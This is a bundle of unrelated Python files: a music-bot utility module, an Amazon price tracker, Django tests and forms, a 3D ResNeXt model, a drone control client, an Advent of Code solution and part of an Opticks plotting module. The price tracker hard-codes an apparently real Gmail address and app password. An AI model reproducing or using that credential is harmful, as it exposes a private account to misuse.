    configured target is 'testing'), update.sh is run and the pip
    requirements are upgraded — a restart is then required. Otherwise only
    youtube-dl is upgraded and reloaded in-place. Returns a human-readable
    HTML status message.
    """
    global log
    new_version = new_release_version()
    target = var.config.get('bot', 'target_version')
    if version.parse(new_version) > version.parse(current_version) or target == "testing":
        log.info('update: new version, start updating...')
        tp = sp.check_output(['/usr/bin/env', 'bash', 'update.sh', target]).decode()
        log.debug(tp)
        log.info('update: update pip libraries dependencies')
        sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', '-r', 'requirements.txt']).decode()
        msg = "New version installed, please restart the bot."
        if target == "testing":
            msg += tp.replace('\n', '<br/>')
    else:
        log.info('update: starting update youtube-dl via pip3')
        tp = sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', 'youtube-dl']).decode()
        msg = ""
        if "Requirement already up-to-date" in tp:
            msg += "Youtube-dl is up-to-date"
        else:
            msg += "Update done: " + tp.split('Successfully installed')[1]
        # Reload the module so the running process uses the new version.
        reload(youtube_dl)
        msg += "<br/> Youtube-dl reloaded"
    return msg
def user_ban(user):
    """Add *user* to the ban table and return a confirmation message."""
    var.db.set("user_ban", user, None)
    return "User " + user + " banned"
def user_unban(user):
    """Remove *user* from the ban table."""
    var.db.remove_option("user_ban", user)
    return "Done"
def get_url_ban():
    """Return an HTML-formatted list of banned url hashes."""
    lines = ["List of ban hash"]
    for entry in var.db.items("url_ban"):
        lines.append(entry[0])
    return "<br/>".join(lines)
def url_ban(url):
    """Add *url* to the ban table and return a confirmation message."""
    var.db.set("url_ban", url, None)
    return "url " + url + " banned"
def url_unban(url):
    """Remove *url* from the ban table."""
    var.db.remove_option("url_ban", url)
    return "Done"
def pipe_no_wait(pipefd):
    ''' Used to fetch the STDERR of ffmpeg. pipefd is the file descriptor returned from os.pipe()

    Puts the pipe into non-blocking mode in a platform-specific way:
    fcntl O_NONBLOCK on Linux/macOS, SetNamedPipeHandleState on Windows.
    Returns True on success, False on failure.
    '''
    if platform == "linux" or platform == "linux2" or platform == "darwin":
        import fcntl
        import os
        try:
            # OR O_NONBLOCK into the existing descriptor flags.
            fl = fcntl.fcntl(pipefd, fcntl.F_GETFL)
            fcntl.fcntl(pipefd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        except:
            print(sys.exc_info()[1])
            return False
        else:
            return True
    elif platform == "win32":
        # https://stackoverflow.com/questions/34504970/non-blocking-read-on-os-pipe-on-windows
        import msvcrt
        import os
        from ctypes import windll, byref, wintypes, GetLastError, WinError
        from ctypes.wintypes import HANDLE, DWORD, POINTER, BOOL
        LPDWORD = POINTER(DWORD)
        PIPE_NOWAIT = wintypes.DWORD(0x00000001)
        ERROR_NO_DATA = 232
        SetNamedPipeHandleState = windll.kernel32.SetNamedPipeHandleState
        SetNamedPipeHandleState.argtypes = [HANDLE, LPDWORD, LPDWORD, LPDWORD]
        SetNamedPipeHandleState.restype = BOOL
        # Translate the CRT file descriptor to a Win32 HANDLE.
        h = msvcrt.get_osfhandle(pipefd)
        res = windll.kernel32.SetNamedPipeHandleState(h, byref(PIPE_NOWAIT), None, None)
        if res == 0:
            print(WinError())
            return False
        return True
class Dir(object):
    """In-memory tree of relative file paths, split into nested Dir nodes."""
    def __init__(self, path):
        # Base name of this directory ('a/b/' -> 'b') and its full path.
        self.name = os.path.basename(path.strip('/'))
        self.fullpath = path
        # name -> Dir for children; plain file names directly in this dir.
        self.subdirs = {}
        self.files = []
    def add_file(self, file):
        """Insert *file* (path relative to this dir) into the tree."""
        # Strip a redundant leading "<this dir>/" component if present.
        if file.startswith(self.name + '/'):
            file = file.replace(self.name + '/', '', 1)
        if '/' in file:
            # This file is in a subdir
            subdir = file.split('/')[0]
            if subdir in self.subdirs:
                self.subdirs[subdir].add_file(file)
            else:
                self.subdirs[subdir] = Dir(os.path.join(self.fullpath, subdir))
                self.subdirs[subdir].add_file(file)
        else:
            self.files.append(file)
        return True
    def get_subdirs(self, path=None):
        """Return the immediate subdirectory names under *path*.

        NOTE(review): the base case returns the internal dict (which
        iterates as names) while the recursive case returns a list —
        callers should not rely on the concrete type.
        """
        subdirs = []
        if path and path != '' and path != './':
            subdir = path.split('/')[0]
            if subdir in self.subdirs:
                searchpath = '/'.join(path.split('/')[1::])
                subdirs = self.subdirs[subdir].get_subdirs(searchpath)
                subdirs = list(map(lambda subsubdir: os.path.join(subdir, subsubdir), subdirs))
        else:
            subdirs = self.subdirs
        return subdirs
    def get_subdirs_recursively(self, path=None):
        """Return all subdirectory paths under *path*, sorted, recursively."""
        subdirs = []
        if path and path != '' and path != './':
            subdir = path.split('/')[0]
            if subdir in self.subdirs:
                searchpath = '/'.join(path.split('/')[1::])
                subdirs = self.subdirs[subdir].get_subdirs_recursively(searchpath)
        else:
            subdirs = list(self.subdirs.keys())
            for key, val in self.subdirs.items():
                subdirs.extend(map(lambda subdir: key + '/' + subdir, val.get_subdirs_recursively()))
        subdirs.sort()
        return subdirs
    def get_files(self, path=None):
        """Return the files directly inside *path* (non-recursive)."""
        files = []
        if path and path != '' and path != './':
            subdir = path.split('/')[0]
            if subdir in self.subdirs:
                searchpath = '/'.join(path.split('/')[1::])
                files = self.subdirs[subdir].get_files(searchpath)
        else:
            files = self.files
        return files
    def get_files_recursively(self, path=None):
        """Return all file paths under *path*, recursively."""
        files = []
        if path and path != '' and path != './':
            subdir = path.split('/')[0]
            if subdir in self.subdirs:
                searchpath = '/'.join(path.split('/')[1::])
                files = self.subdirs[subdir].get_files_recursively(searchpath)
        else:
            files = self.files
            for key, val in self.subdirs.items():
                files.extend(map(lambda file: key + '/' + file, val.get_files_recursively()))
        return files
    def render_text(self, ident=0):
        """Print the tree as indented text (4 spaces per level)."""
        print('{}{}/'.format(' ' * (ident * 4), self.name))
        for key, val in self.subdirs.items():
            val.render_text(ident + 1)
        for file in self.files:
            print('{}{}'.format(' ' * (ident + 1) * 4, file))
# Parse the html from the message to get the URL
def get_url_from_input(string):
    """Extract a URL from a chat message.

    Returns the string itself when it already starts with 'http', the
    href target when it is an HTML anchor, or False when nothing matches.
    """
    if string.startswith('http'):
        return string
    match = re.search(r'href="(.+?)"', string, re.IGNORECASE)
    return match.group(1) if match else False
def youtube_search(query):
    """Scrape YouTube's search results page for *query*.

    Returns a list of (video_id, title, uploader) tuples, or False on
    network errors or when nothing matched.

    NOTE(review): relies on regexes over the raw HTML, which breaks
    whenever YouTube changes its markup.
    """
    global log
    try:
        r = requests.get("https://www.youtube.com/results", params={'search_query': query}, timeout=5)
        results = re.findall("watch\?v=(.*?)\".*?title=\"(.*?)\".*?"
                             "(?:user|channel).*?>(.*?)<", r.text)  # (id, title, uploader)
        if len(results) > 0:
            return results
    except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
        # Log only the part of the traceback before exception chaining noise.
        error_traceback = traceback.format_exc().split("During")[0]
        log.error("util: youtube query failed with error:\n %s" % error_traceback)
    return False
|
import requests
from bs4 import BeautifulSoup
import smtplib
import time
import mysql.connector
from datetime import date
from datetime import datetime
# NOTE(review): database credentials are hard-coded — move to config/env.
conn=mysql.connector.connect(user='root',passwd='root',host='localhost',database='Project')
mycursor=conn.cursor()
print("-------------------------------------------------------------------------------------------------")
print("\n \t\tHELLO WELCOME TO ONLINE PRICE TRACKER:-")
print("-------------------------------------------------------------------------------------------------")
# Interactive configuration: product URL, notification address, threshold.
URL=input("\nEnter the link of the product to be monitered:-")
print("-------------------------------------------------------------------------------------------------")
ma=input("\nEnter the E_mail Address on which yo want to get notified:")
print("-------------------------------------------------------------------------------------------------")
pri=input("\nEnter the price to be compared:")
print("-------------------------------------------------------------------------------------------------")
dat=date.today()
pri=int(pri)
# Desktop browser User-Agent so Amazon serves the full product page.
headers={"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'}
def check_price():
    """Scrape the Amazon product page and record/notify when price < threshold.

    Uses the module-level URL, headers, pri (threshold), ma (email), dat
    and current_time globals. On a hit, the event is inserted into MySQL
    and an alert email is sent via send_mail().
    """
    page = requests.get(URL, headers=headers)
    soup=BeautifulSoup(page.content, 'html.parser')
    title = soup.find(id="productTitle").get_text()
    print("\n")
    print(title.strip())
    print("-------------------------------------------------------------------------------------------------")
    print("\n")
    price =soup.find(id="priceblock_ourprice").get_text()
    price2=price[2:6]
    # NOTE(review): fragile parsing — keeps only two digits of the price
    # text and multiplies by 1000, which assumes a fixed currency prefix
    # and a five-digit price. Breaks for other formats; confirm/robustify.
    converted_price = float(price[2:4])
    #print (converted_price)
    fullp=converted_price
    converted_price=converted_price*1000
    fullp=fullp*1000
    print(current_time)
    if(converted_price<pri):
        mycursor.execute("INSERT INTO Proj1(email,pri,date1,time1) VALUES(%s, %s, %s , %s)",(ma,fullp,dat,current_time))
        #print(fullp)
        conn.commit()
        send_mail()
    print("-------------------------------------------------------------------------------------------------")
def send_mail():
    # Send the "price dropped" notification to the user-supplied address `ma`.
    # SECURITY(review): Gmail credentials are hard-coded in source — move them
    # to environment variables / a secrets store and rotate this app password.
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.ehlo()
    server.starttls()  # upgrade the connection to TLS before logging in
    server.ehlo()
    server.login('patil.pratik989098@gmail.com','ojuizjfxcadhgjrw')
    subject = 'Price fell down!!!'
    # NOTE(review): the body links one fixed product URL, not the monitored
    # global `URL` — confirm whether this is intentional.
    body = 'Check the amazon link: https://www.amazon.in/VivoBook-PCIEG-256GB-Windows-X509UA-EJ362T/dp/B07WNGR6MJ/ref=sr_1_1_sspa?keywords=asus+vivobook+x509&qid=1568964886&s=gateway&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUFNMEdGTEhJM09WQ0ImZW5jcnlwdGVkSWQ9QTEwMTc4NzExNzhPUDZRMFc0MDUyJmVuY3J5cHRlZEFkSWQ9QTAxODAwMjExQlhFTDI5SVJaMlpCJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='
    msg = f"Subject: {subject}\n\n{body}"
    server.sendmail('patil.pratik989098@gmail.com',ma,msg)
    print('Hey Email has been sent!!')
    server.quit()
# Poll once per minute forever; `current_time` is a module global that
# check_price() reads for the DB timestamp column.
while(True):
    now =datetime.now()
    current_time = now.strftime("%H:%M:%S")
    check_price()
    time.sleep(60)
|
from django.test import TestCase
from .models import Feature
from .forms import featureForm
from django.contrib.auth.models import User
from django.contrib import messages
class TestViews(TestCase):
    """Smoke tests for the features app: list view, detail view, POST
    submission, and featureForm validation."""

    def test_get_all_features_page(self):
        response = self.client.get('/features/')
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'features.html')

    def test_feature_detail(self):
        author = User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        item = Feature(featureName='Test Feature', author=author)
        item.save()
        response = self.client.get('/features/{0}'.format(item.id), follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'feature.html')

    def test_post_request_feature(self):
        User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        payload = {'description': 'test content', 'featureName': 'test feature'}
        response = self.client.post('/features/', payload, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'features.html')

    def test_feature_form(self):
        User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        form = featureForm(data={'featureName': 'testFeature', 'description': 'testDescription'})
        self.assertTrue(form.is_valid())

    def test_feature_form_missing_field(self):
        User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        form = featureForm(data={'ticketName': '', 'description': 'testDescription'})
        self.assertFalse(form.is_valid())
|
from django.forms.widgets import HiddenInput
from .models import Comment, UserLike, UserDislike
from django import forms
class CommentForm(forms.ModelForm):
    # Form exposing only the comment body field.
    class Meta:
        model = Comment
        fields = ('body',)
        # NOTE(review): 'comment' is not in `fields`, so Django ignores this
        # widget entry entirely; if the intent was to hide the body input the
        # key should be 'body' — confirm intended rendering before changing.
        widgets = {'comment': HiddenInput()}
class LikeForm(forms.ModelForm):
    # Field-less form; presumably used as a CSRF-protected "like" submit button.
    class Meta:
        model = UserLike
        fields = ()
        # NOTE(review): with no declared fields this widget mapping has no effect.
        widgets = {'post': HiddenInput()}
class DislikeForm(forms.ModelForm):
    # Field-less form; presumably used as a CSRF-protected "dislike" submit button.
    class Meta:
        model = UserDislike
        fields = ()
        # NOTE(review): with no declared fields this widget mapping has no effect.
        widgets = {'post': HiddenInput()}
from functools import partial, reduce
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Dense, Lambda, Conv3D
from tensorflow.keras.layers import Activation, BatchNormalization
from tensorflow.keras.layers import Input, concatenate, Add, Flatten, Reshape, Dropout
from tensorflow.keras.layers import GlobalAveragePooling3D, GlobalMaxPooling3D, MaxPooling3D
from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
def __default_conv3D(input, filters=8, kernel_size=3, strides=(1,1,1), weight_decay = 1e-4, **kwargs):
    '''
    Description: apply a Conv3D layer with the project-wide default settings
    (SAME padding, bias, l2 kernel regularization, he_normal init) to `input`.
    '''
    conv = keras.layers.Conv3D(
        filters=filters,
        kernel_size=kernel_size,
        strides=strides,
        padding="SAME",
        use_bias=True,
        kernel_regularizer=keras.regularizers.l2(weight_decay),
        kernel_initializer="he_normal",
        **kwargs
    )
    return conv(input)
def __init_conv(input, filters=64, strides=(1,1,1), weight_decay=5e-4):
    '''
    Description: initial convolutional stem before the ResNeXt blocks
                 (conv -> BN -> ReLU -> 2x2x2 max-pool).
    Args:   input: input tensor
            filters: number of filters
            strides: strides, must be a tuple
            weight_decay: parameter for l2 regularization
    Return: output tensor
    '''
    # BUG FIX: the weight_decay parameter was previously ignored (a literal
    # 5e-4 was passed to the conv); forward the caller-supplied value instead.
    x = __default_conv3D(input, filters=filters, strides=strides, weight_decay=weight_decay)
    x = BatchNormalization(axis = -1)(x)
    x = Activation('relu')(x)
    x = MaxPooling3D(pool_size = (2,2,2))(x)
    return x
def __init_grouped_conv(input, filters = 128, strides = (1,1,1), weight_decay = 5e-4):
    # Grouped stem: one conv over the full input plus one single-channel conv
    # per input channel, all concatenated along the channel axis.
    # NOTE(review): the full-input conv gets `filters - C*2` filters while each
    # per-channel conv gets `filters`, so the merged output has far more than
    # `filters` channels — confirm this channel budget is intended.
    init = __default_conv3D(input, filters = filters - input.shape[-1] * 2, strides=strides, weight_decay=weight_decay)
    group_channel = [init]
    for i in range(input.shape[-1]):
        # Slice out channel i, then restore the trailing channel axis.
        # NOTE(review): the lambda captures `i` by reference; fine here because
        # the layer is called immediately, but it would break on model reload.
        x = Lambda(lambda z:z[:, :, :, :, i])(input)
        x = tf.keras.backend.expand_dims(x, -1)
        x = __default_conv3D(x, filters = filters, strides = strides, weight_decay=weight_decay)
        group_channel.append(x)
    group_merge = concatenate(group_channel, axis = -1)
    x = BatchNormalization()(group_merge)
    x = Activation('relu')(x)
    return x
def __init_split_conv(input, filters = 8, strides = (1,1,1), weight_decay = 5e-4):
    # Per-channel stem: for each input channel build a small residual unit
    # (conv -> 1x1 downsampling bottleneck with skip) and concatenate the results.
    group_channel = []
    for i in range(input.shape[-1]):
        # Isolate channel i and restore the channel axis.
        x = Lambda(lambda z:z[:, :, :, :, i])(input)
        x = tf.keras.backend.expand_dims(x, -1)
        x = __default_conv3D(x, filters = filters, strides = strides, weight_decay=weight_decay)
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        # Projection shortcut: 1x1 conv with stride 2 matches the main path's
        # downsampled shape so the tensors can be added.
        x_orig = __default_conv3D(x, kernel_size=1, filters = filters, strides = (2,2,2), weight_decay=weight_decay)
        x = __default_conv3D(x, kernel_size=1, filters = filters // 2, strides = (2,2,2), weight_decay=weight_decay)
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        x = __default_conv3D(x, kernel_size=3, filters = filters, strides = (1,1,1), weight_decay=weight_decay)
        x = x + x_orig  # residual add
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        group_channel.append(x)
    group_merge = concatenate(group_channel, axis = -1)
    x = BatchNormalization()(group_merge)
    x = Activation('relu')(x)
    return x
def __bottleneck_layer(input, filters = 64, kernel_size = 3, strides = (1,1,1), cardinality = 16, weight_decay = 5e-4):
    '''
    Description: bottleneck layer for a single path(cardinality = 1):
                 1x1 reduce -> kxkxk conv -> 1x1 expand, each with BN.
    Args:   input: input tensor
            filters : number of filters for the last layer in a single path, suppose to be total number
                      of filters // cardinality of ResNeXt block.
            strides : strides, must be tuple of 3 elements
            weight_decay: l2 regularization strength, forwarded to every conv
    '''
    # BUG FIX: weight_decay was accepted but never forwarded, so every conv
    # silently used __default_conv3D's 1e-4 default; pass it through.
    x = input
    x = __default_conv3D(x, filters = filters // 2 // cardinality, kernel_size = 1, strides = strides, weight_decay = weight_decay)
    x = BatchNormalization()(x)
    x = Activation('relu')(x)
    x = __default_conv3D(x, filters = filters // 2 // cardinality, kernel_size = kernel_size, strides = (1,1,1), weight_decay = weight_decay)
    x = BatchNormalization()(x)
    x = Activation('relu')(x)
    # 1x1 expansion back to `filters` channels; no ReLU here — the ResNeXt
    # block applies the activation after the residual add.
    x = __default_conv3D(x, filters = filters, kernel_size = 1, strides = (1,1,1), weight_decay = weight_decay)
    x = BatchNormalization()(x)
    return x
def __ResNeXt_block(input, filters = 64, kernel_size = 3, strides = (1,1,1), cardinality = 16, weight_decay = 5e-4):
    '''
    Description: refer to the ResNeXt architechture. One ResNeXt_block contains several paths (cardinality) of bottleneck layers joint by a skip connection.
    '''
    # Shortcut branch: identity when resolution is unchanged, otherwise a
    # strided projection conv to match the downsampled shape.
    # NOTE(review): the projection uses kernel_size=3; ResNeXt conventionally
    # uses a 1x1 shortcut — confirm this is deliberate.
    if strides[0] == 1:
        init = input
    elif strides[0] > 1:
        init = __default_conv3D(input, filters = filters, kernel_size=kernel_size, strides=strides, weight_decay = weight_decay)
        init = BatchNormalization()(init)
    # All `cardinality` bottleneck paths branch from the same input tensor.
    x = [init]
    for i in range(cardinality):
        x_sub = __bottleneck_layer(input, filters = filters, kernel_size=kernel_size, strides=strides, cardinality=cardinality, weight_decay=weight_decay)
        x_sub = BatchNormalization()(x_sub)
        x.append(x_sub)
    x = Add()(x)  # sum shortcut + every path, then activate
    x = Activation('relu')(x)
    return x
def create_model(input, filters = 64, depth = (2,2,2), cardinality = 16, weight_decay = 5e-4):
    '''
    Description: assemble the 3D ResNeXt: stem conv, stacked ResNeXt stages
                 (filter count doubling per stage), global pooling, Dense(5) head.
    Args:   input: input tf tensor
            filters: filter numbers of initial convolutional layer and first chunk ResNeXt blocks. Filter number doubles there after
            depth: a tuple of number of ResNeXt blocks for each step of feature map resolution.
            cardinality: number of bottleneck layer paths
            weight_decay: l2 regularization parameter
    Return: output: output tf tensor
    '''
    stage_filters = [filters * (2 ** i) for i in range(len(depth))]
    x = __init_conv(input, filters=filters, strides=(2,2,2), weight_decay=weight_decay)
    for n_blocks, n_filters in zip(depth, stage_filters):
        for i in range(n_blocks):
            # The first block of each stage halves the resolution.
            stride = (2,2,2) if i == 0 else (1,1,1)
            x = __ResNeXt_block(x, filters = n_filters, strides=stride, cardinality = cardinality, weight_decay = weight_decay)
    x = GlobalAveragePooling3D()(x)
    x = Flatten()(x)
    return Dense(5)(x)
def create_model_v2(input, filters = 8, weight_decay = 5e-4, dropout = 0.2):
    '''
    Description: alternative head — split-conv stem, one wide downsampling
    conv, global pooling, then five independent Dense(128)->Dropout->Dense(1)
    regressors concatenated into a 5-vector output.
    '''
    x = __init_split_conv(input, filters = filters)
    x = __default_conv3D(x, filters = 1024, strides=(2,2,2), weight_decay = weight_decay)
    x = BatchNormalization()(x)
    x = Activation('relu')(x)
    x = GlobalAveragePooling3D()(x)
    x = Flatten()(x)
    heads = []
    for _ in range(5):
        head = Dense(128)(x)
        head = Dropout(dropout)(head)
        heads.append(Dense(1)(head))
    return concatenate(heads, axis = -1)
if __name__ == "__main__":
    # Smoke-test driver: build the model on dummy data.
    import numpy as np
    # Allow TF to grow GPU memory instead of pre-allocating everything.
    gpus = tf.config.experimental.list_physical_devices('GPU')
    for gpu in gpus:
        tf.config.experimental.set_memory_growth(gpu, True)
    input = Input(shape = (53, 63, 52, 53), batch_size = 4, dtype = tf.float32)
    output = create_model(input, filters = 128)
    model = Model(input, output)
    optimizer = keras.optimizers.RMSprop(0.001)
    model.compile(loss="mse",
                  optimizer=optimizer,
                  metrics=["mse", "mae"],
                  experimental_run_tf_function=False)
    # NOTE(review): dummy batch is 8 but Input declares batch_size=4 — the
    # commented-out fit() below would fail; confirm before re-enabling.
    x = tf.constant(np.zeros(shape = (8, 53, 63, 52, 53), dtype = np.float32))
    y = tf.constant(np.zeros(shape = (8,5), dtype = np.float32))
    z = __init_grouped_conv(x, strides = (2,2,2))
    #model.fit(x,y,epochs = 3)
    #model.summary()
|
import logging, time, argparse, configparser, sys
import socket, os, signal, psutil
from subprocess import Popen
from drone import Drone
from connection_watchdog import ConnectionWatchdog
from data_receiver import DataReceiver
from utils import Utils
# CLI: optional --d <dir> points at the application directory (default: cwd).
parser = argparse.ArgumentParser()
parser.add_argument('--d', nargs=1, default=None)
args = parser.parse_args()
# FIX: compare against None with `is not None` (PEP 8) instead of `!=`.
APP_DIR = args.d[0] if args.d is not None else "./"
CONFIGURATIONS = APP_DIR + 'configuration.ini'
# Log everything both to a timestamped file under <app>/logs and to stderr.
logging.basicConfig(
    level=logging.DEBUG,
    format="%(asctime)s [%(levelname)s] %(message)s",
    handlers=[
        logging.FileHandler(APP_DIR + 'logs/main app | ' + str(time.asctime()) + '.log'),
        logging.StreamHandler()
    ]
)
# Abort early if the INI file is missing/unreadable (read() returns the list
# of files successfully parsed).
config = configparser.ConfigParser()
if len(config.read(CONFIGURATIONS)) == 0:
    logging.error("Could Not Read Configurations File: " + CONFIGURATIONS)
    sys.exit()
DRONE_ID = config['drone']['id']
HOST_IP = config['cloud-app']['ip']
DRONE_CLOUD_SERVER_PORT = int( config['cloud-app']['control-port'])
MAX_RECONNECTION_ATTEMPTS = int( config['cloud-app']['max-reconnection-attempts'])
if __name__ == '__main__':
    # Keep retrying drone initialization until the hardware comes up.
    while(True):
        try:
            drone = Drone(config)
            break
        except Exception as e:
            logging.error(str(e), exc_info=True)
            time.sleep(2)
    # Watchdog monitors connectivity to the cloud host; its net_status flag
    # gates the telemetry loop below.
    watchdog = ConnectionWatchdog(drone, HOST_IP, MAX_RECONNECTION_ATTEMPTS)
    watchdog.start()
    video_streamer_proc = None
    control_server_socket = None
    server_message_receiver = None
    # Main connect / stream / cleanup cycle; repeats after every failure.
    while drone.is_active:
        try:
            # Wait for the network, plus a grace period before reconnecting.
            while not watchdog.net_status:
                time.sleep(1)
            time.sleep(3)
            control_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            control_server_socket.connect((HOST_IP, DRONE_CLOUD_SERVER_PORT))
            logging.info('Socket Connection Opened')
            # Handshake: identify this drone to the control server.
            droneIdBytes = Utils.createNetworkMessage(str.encode(DRONE_ID))
            control_server_socket.send(droneIdBytes)
            logging.info('Drone ID: %s Connected To Control Server Endpoint: %s:%s', str(DRONE_ID), HOST_IP, str(DRONE_CLOUD_SERVER_PORT))
            # Video streaming runs as a separate process; commands from the
            # server are handled by a dedicated receiver thread.
            video_streamer_proc = Popen('/usr/bin/python3 ' + APP_DIR + 'video_streamer.py', shell=True)
            server_message_receiver = DataReceiver(control_server_socket, drone)
            server_message_receiver.start()
            # Telemetry: push serialized drone state once per second.
            while watchdog.net_status and drone.is_active:
                msg = Utils.createNetworkMessage(drone.getDroneDataSerialized())
                control_server_socket.send(msg)
                time.sleep(1)
        except Exception as e:
            logging.error(str(e), exc_info=True)
            drone.freeze()  # hold position while disconnected
        finally:
            # Tear down the streamer (and any children it spawned via the
            # shell), the control socket, and the receiver thread.
            if video_streamer_proc != None:
                current_process = psutil.Process(video_streamer_proc.pid)
                children = current_process.children(recursive=True)
                for child in children:
                    if child.pid != os.getpid():
                        os.kill(child.pid, signal.SIGKILL)
                os.kill(video_streamer_proc.pid, signal.SIGKILL)
            if control_server_socket != None:
                control_server_socket.close()
            if server_message_receiver != None:
                server_message_receiver.stop()
            drone.close()
    logging.info('Drone Offline')
#Advent of Code 2020 - Day 10
def get_input(file):
    """Read newline-separated jolt ratings from *file* and prepend the
    0-jolt charging outlet."""
    with open(file, 'r') as f:
        ratings = [int(line) for line in f.read().split("\n")]
    return [0] + ratings
# Adapter lists for the real puzzle input and the worked example, sorted ascending.
input_jolts = sorted(get_input("day10_input.txt"))
test_jolts = sorted(get_input("day10_test.txt"))
def use_all(input_val):
    """Part 1: chain every adapter in sorted order, tally 1- and 3-jolt gaps,
    and return (#1-jolt gaps) * (#3-jolt gaps)."""
    # The built-in adapter is always 3 jolts above the highest one, hence 3:1.
    gaps = {1: 0, 2: 0, 3: 1}
    for lo, hi in zip(input_val, input_val[1:]):
        gaps[hi - lo] += 1
    return gaps[1] * gaps[3]
#print (use_all(input_jolts))
def find_all_combinations(input_val):
    """Build an adjacency map: adapter -> list of adapters reachable with a
    +1..+3 jolt step, from a sorted adapter list.

    NOTE(review): the loop stops at len-2, so the children of the
    second-to-last adapter are never appended (its entry stays []); part2
    compensates by treating childless nodes as pass-through — confirm
    before reusing this tree elsewhere.
    """
    full_tree = {0:[]}
    for x in range(len(input_val) - 2):
        try:
            next_three = [input_val[x+1], input_val[x+2], input_val[x+3]]
        except IndexError:
            # Near the end of the list, pad the lookahead window with 0
            # (0 can never satisfy the +1..+3 test below).
            next_three = [input_val[x+1], input_val[x+2], 0]
        for element in range(len(next_three)):
            if next_three[element] - input_val[x] in [1,2,3]:
                full_tree[input_val[x]].append(next_three[element])
                full_tree[next_three[element]] = []
    full_tree[input_val[-1]] = []  # device adapter: terminal node
    return full_tree
# Debug output for the worked example.
print (find_all_combinations(test_jolts))
def part2(input_val):
    """Count the distinct adapter arrangements by walking the adjacency tree
    backwards and summing path counts at each branch point."""
    tree = find_all_combinations(input_val)
    input_val = input_val[::-1]  # process from the device back to the outlet
    paths = {}
    last_split = 1
    for x in range(len(input_val)):
        current_adapter = input_val[x]
        if len(tree[current_adapter]) > 1:
            # Branch point: paths through it = sum over its children.
            paths[current_adapter] = sum(paths[x] for x in tree[current_adapter])
            last_split = paths[current_adapter]
        else:
            # Single/childless node: carries the count of the last branch.
            paths[current_adapter] = last_split
    return paths[0]
# Part 2 answer for the real input.
print (part2(input_jolts))
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
ana.py geometrical and plotting utils
========================================
TODO: reposition these into more appropriate locations
"""
import os, logging, sys
import numpy as np
from opticks.ana.base import opticks_main
from opticks.ana.nbase import count_unique, vnorm
from opticks.ana.evt import Evt, costheta_
deg = np.pi/180.  # degree -> radian conversion factor
log = logging.getLogger(__name__)
X,Y,Z,W = 0,1,2,3  # cartesian/homogeneous component index aliases
def theta(xyz):
    """
    :param xyz: array of cartesian coordinates
    :return: array of spherical-coordinate polar angles, theta, in degrees

    First subtract off any needed translations to align
    the coordinate system with focal points.

    Spherical coordinates (theta is the polar angle 0:pi, phi azimuthal 0:2pi):

        z = r cos(th)   =>   th = arccos(z / r)
    """
    #r = np.linalg.norm(xyz, ord=2, axis=1)
    r = vnorm(xyz)              # radial distance per row
    ct = xyz[:,2] / r           # cos(theta) = z / r
    return np.arccos(ct)*180./np.pi
def scatter3d(fig, xyz):
    # Add a 3D scatter of the (N,3) coordinate array to the given figure.
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(xyz[:,0], xyz[:,1], xyz[:,2])
def histo(fig, vals):
    # Histogram `vals` over 0-90 (degree range) with 1-degree-ish bins.
    ax = fig.add_subplot(111)
    ax.hist(vals, bins=91,range=[0,90])
def xyz3d(fig, path):
    # Load an .npy file of flattened coordinates and scatter it in 3D.
    xyz = np.load(path).reshape(-1,3)
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(xyz[:,0], xyz[:,1], xyz[:,2])
class Rat(object):
    """Ratio of the lengths of two sequences, with a label for reporting."""
    def __init__(self, n, d, label=""):
        self.n = len(n)
        self.d = len(d)
        self.r = float(self.n) / float(self.d)
        self.label = label
    def __repr__(self):
        return "Rat %s %s/%s %5.3f " % (self.label, self.n, self.d, self.r)
def recpos_plot(fig, evts, irec=0, nb=100, origin=[0,0,0] ):
    # One row of X/Y/Z position histograms per event, for record index irec,
    # with positions shifted by `origin`.
    origin = np.asarray(origin)
    nr = len(evts)
    nc = 3
    clab = ["X","Y","Z"]
    for ir,evt in enumerate(evts):
        pos = evt.rpost_(irec)[:,:3] - origin
        for ic, lab in enumerate(clab):
            ax = fig.add_subplot(nr,nc,1+ic+nc*ir)
            ax.hist(pos[:,ic],bins=nb)
            ax.set_xlabel(lab)
def angle_plot(fig, evts, irec=0, axis=[0,0,1], origin=[0,0,-200], nb=100):
    # One histogram per event of the angle (degrees) between each recorded
    # position (relative to `origin`) and the given axis.
    origin = np.asarray(origin)
    nc = len(evts)
